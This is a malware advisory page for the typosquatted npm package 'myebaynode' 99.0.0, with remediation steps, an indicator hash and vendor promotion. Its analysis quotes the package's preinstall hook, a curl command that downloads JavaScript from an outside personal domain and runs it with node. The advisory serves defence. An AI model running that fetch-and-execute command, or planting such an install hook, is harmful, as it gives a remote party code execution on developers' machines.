Which versions of myebaynode are malicious?

The following npm versions of myebaynode are flagged malicious: 99.0.0. Treat any of these as compromised.

How do I remediate myebaynode if I installed it?

myebaynode is a typosquat — you almost certainly intended a legitimately-named package. Remove myebaynode, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

I already installed myebaynode — how do I know if it already compromised me?

If myebaynode was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is myebaynode part of a known attack campaign?

Yes — myebaynode is associated with the IN-MAL-2026-007197 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find myebaynode across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for myebaynode (version 99.0.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging myebaynode across your stack and pipelines.

Malicious package

myebaynodenpm

Malicious code in myebaynode (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6296

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall myebaynode

What this malware does

package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on npm install. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggests brand-impersonation intended to lure developers searching for an eBay SDK.

Malicious versions

1 flagged

99.0.0

Indicators of compromise (SHA-256)

12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3

Detection & response playbook

Typosquat

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for myebaynode (version 99.0.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging myebaynode across your stack and pipelines.
If you installed it — respond
myebaynode is a typosquat — you almost certainly intended a legitimately-named package. Remove myebaynode, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If myebaynode was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks myebaynode before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. myebaynode on npm has been identified as a malicious package (version 99.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007197

References

npmjs.com

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks myebaynode-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring